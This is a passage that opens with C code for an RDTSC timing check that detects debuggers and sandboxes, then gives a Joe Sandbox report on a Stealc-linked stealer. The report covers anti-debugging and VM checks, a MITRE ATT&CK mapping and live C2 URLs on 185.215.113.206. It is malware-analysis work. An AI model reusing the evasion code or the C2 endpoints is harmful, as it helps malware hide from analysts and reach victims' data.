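uint64_t median_u64(uint64_t *v, size_t n) {
    qsort(v, n, sizeof v[0], cmp_u64);
    return v[n / 2];
}

/* Pure decision: 1 = delta above threshold ("instrumented"), 0 = native. */
int looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

/* Run the measurement `samples` times (1..64) and decide on the median. */
int timing_check(size_t samples, uint64_t threshold) {
    uint64_t buf[64];
    if (samples == 0 || samples > 64) samples = 16;
    for (size_t i = 0; i < samples; i++) buf[i] = rdtsc_delta();
    return looks_instrumented(median_u64(buf, samples), threshold);
}

int main(void) {
    /* ASSUMED threshold: a native run of this filler costs tens of cycles;
     * a trapped RDTSC or single-stepping costs thousands. */
    const uint64_t threshold = 500;
    printf("rdtsc check: %s\n",
           timing_check(16, threshold) ? "instrumented" : "native");
    return 0;
}
```

Two practical points follow from running it. First, a plain VM in which RDTSC is not intercepted reports "native", which is why Joe Sandbox's interceptor rewrites the instruction rather than relying on the hypervisor: the check detects tracing and emulation, not virtualisation as such. Second, because the sample emits so many rdtsc pairs, an analyst stepping through this code by hand will trip the check every time; patching the sandbox's reported TSC (or a debugger plugin that fakes a small delta) is the usual response.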
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DFC17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DD362 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7A3DA1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DFB34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 78DB09 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 806AD8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27551
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27624
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A18A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A3910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003AE210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A4B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A4B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A23A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003A2390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003ACBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003AD530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003ADD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003916B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003916A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_003B1BF0
Source: file.exe, file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2325828976.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2325828976.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26356)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26209)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26363)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26228)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26252)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394A60 VirtualProtect 00000000,00000004,00000100,?,0_2_00394A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B6390 mov eax, dword ptr fs:[00000030h],0_2_003B6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003B2A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_003B4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003B46A0
Source: file.exe, file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: EProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003B2D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003B1B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003B2A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003B2C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (numbers in parentheses are the counts of matched signatures per technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (4) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 51% | Virustotal | | Browse
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.206~ | 0% | Avira URL Cloud | safe |
http://185.215.113.206/c4becf79229cb002.phpK | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.phpK | 19% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpK | file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | false | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://185.215.113.206/B | file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206~ | file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.206/p | file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php# | file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | false | | high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560661
Start date and time: 2024-11-22 05:15:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 121
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/68b591d6548ec281/sqlite3.dll
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
